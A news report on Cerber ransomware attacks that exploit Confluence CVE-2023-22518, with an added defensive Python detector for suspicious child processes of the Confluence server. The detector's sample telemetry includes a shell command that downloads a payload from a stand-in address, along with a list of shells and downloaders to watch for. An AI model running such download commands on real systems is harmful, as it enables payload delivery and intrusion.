Attackers have begun to exploit a critical authentication bypass vulnerability in Atlassian Confluence, using it to encrypt the files of victims with Cerber ransomware. Atlassian has identified this flaw as an improper authorization vulnerability and it has been assigned the identifier CVE-2023-22518. This vulnerability, rated 9.1 out of 10 in severity, affects all versions of Confluence Data Center and Confluence Server software. The company released security updates last week and urged administrators to immediately patch any vulnerable instances, as the flaw could also be used to erase data.
Atlassian's Chief Information Security Officer (CISO), Bala Sathiamurthy, stated, "As part of our continuous security assessment processes, we have discovered that Confluence Data Center and Server customers are vulnerable to significant data loss if exploited by an unauthenticated attacker," and emphasized that while there were no reports of active exploitation at the time, "customers must take immediate action to protect their instances."
Atlassian issued another warning a few days later, notifying customers that a proof-of-concept exploit was already available online, although there was no evidence of ongoing exploitation. The company advised those who couldn't immediately patch their systems to implement mitigation measures, such as backing up unpatched instances and blocking Internet access to unpatched servers until they could be secured.
According to data from ShadowServer, a threat monitoring service, there are currently over 24,000 Confluence instances exposed online. However, it's unclear how many of these are vulnerable to CVE-2023-22518 attacks. Atlassian updated their advisory last Friday, warning that threat actors were already targeting the vulnerability.
Over the weekend, GreyNoise, a threat intelligence company, warned of widespread exploitation of CVE-2023-22518 starting on Sunday, November 5. Rapid7, a cybersecurity company, also reported observing attacks against Internet-exposed Atlassian Confluence servers, with exploits targeting both the CVE-2023-22518 authentication bypass and an older critical privilege escalation vulnerability, CVE-2023-22515.
Rapid7 stated, "As of November 5, 2023, Rapid7 Managed Detection and Response (MDR) is observing exploitation of Atlassian Confluence in multiple customer environments, including for ransomware deployment." The company observed post-exploitation command execution to download a malicious payload, which, if successful, led to single-system Cerber ransomware deployment on the exploited Confluence server.
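The post-exploitation behaviour Rapid7 describes (the Confluence server process spawning a shell or downloader to fetch a payload) is something defenders can hunt for in process-creation telemetry regardless of which Confluence bug was used to get there. The Python below is an added example, not code from the article, Rapid7 or Atlassian: it runs a simple parent/child heuristic over constructed JSON-lines process events (the field names, hosts and the 203.0.113.10 documentation address are all made up for illustration).

```python
import json
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events (JSON lines), not real telemetry.
# Field names imitate what an EDR, auditd or Sysmon pipeline typically exports.
# Raw string so the Windows backslashes survive as JSON escapes.
SAMPLE_EVENTS = r"""
{"ts":"2023-11-05T09:14:02Z","host":"wiki-01","user":"confluence","parent_image":"/opt/atlassian/confluence/jre/bin/java","parent_cmdline":"java -Dconfluence.home=/var/atlassian/application-data/confluence org.apache.catalina.startup.Bootstrap","image":"/bin/sh","cmdline":"sh -c 'curl -fsSL http://203.0.113.10/update -o /tmp/.x'"}
{"ts":"2023-11-05T09:15:00Z","host":"wiki-01","user":"root","parent_image":"/usr/sbin/cron","parent_cmdline":"/usr/sbin/cron -f","image":"/usr/bin/curl","cmdline":"curl -s https://updates.example.internal/health"}
{"ts":"2023-11-05T09:16:30Z","host":"wiki-01","user":"confluence","parent_image":"/opt/atlassian/confluence/jre/bin/java","parent_cmdline":"java -Dconfluence.home=/var/atlassian/application-data/confluence org.apache.catalina.startup.Bootstrap","image":"/usr/bin/git","cmdline":"git --version"}
{"ts":"2023-11-05T09:20:11Z","host":"wiki-02","user":"NT AUTHORITY\\SYSTEM","parent_image":"C:\\Program Files\\Atlassian\\Confluence\\jre\\bin\\java.exe","parent_cmdline":"java.exe -Dconfluence.home=C:\\Atlassian\\ApplicationData\\Confluence","image":"C:\\Windows\\System32\\cmd.exe","cmdline":"cmd.exe /c whoami"}
"""

# Children a web application process has little reason to spawn.
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe"}
DOWNLOADERS = {"curl", "wget", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased; handles both '/' and '\\' separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_confluence_java(event: Dict) -> bool:
    """True when the parent is the Confluence JVM (java/java.exe with confluence.home set)."""
    return (basename(event["parent_image"]).startswith("java")
            and "confluence" in event["parent_cmdline"].lower())


def classify(event: Dict) -> Optional[str]:
    """Return a severity for a process-creation event, or None if it is uninteresting."""
    if not is_confluence_java(event):
        return None
    child = basename(event["image"])
    cmdline = event["cmdline"]
    # Web app launching a downloader, or a shell whose command line carries a URL:
    # matches the "command execution to download a payload" pattern.
    if child in DOWNLOADERS or (child in SHELLS and URL_RE.search(cmdline)):
        return "high"
    # Any shell spawned by the JVM is worth a look even without a URL.
    if child in SHELLS:
        return "medium"
    return None


def detect(jsonl: str) -> List[Dict]:
    """Parse JSON-lines events and return one alert per suspicious child process."""
    alerts: List[Dict] = []
    for raw in jsonl.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        event = json.loads(raw)
        severity = classify(event)
        if severity:
            alerts.append({
                "severity": severity,
                "ts": event["ts"],
                "host": event["host"],
                "child": basename(event["image"]),
                "cmdline": event["cmdline"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['severity']:6}] {alert['ts']} {alert['host']} {alert['child']}: {alert['cmdline']}")
```

Running the block flags the Linux event where the JVM spawns `sh` with a `curl ... http://` command as high and the Windows `cmd.exe /c whoami` child as medium, while ignoring cron's own curl (wrong parent) and the JVM running `git` (not a shell or downloader). Because the rule keys on parent/child behaviour rather than on a specific request path, it is independent of whether CVE-2023-22518 or CVE-2023-22515 was the entry point; in a real deployment you would tune the allow-list for helpers Confluence legitimately launches on your hosts and pair it with the access-log review and exposure reduction Atlassian recommends.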
Last month, CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) issued a joint advisory, urging administrators to secure Atlassian Confluence servers against the actively exploited CVE-2023-22515 privilege escalation bug. According to a Microsoft report, this bug has been under active exploitation since at least September 14. Cerber ransomware was also used in attacks targeting Atlassian Confluence servers two years ago, exploiting a remote code execution vulnerability, CVE-2021-26084, which had previously been used to install crypto-miners.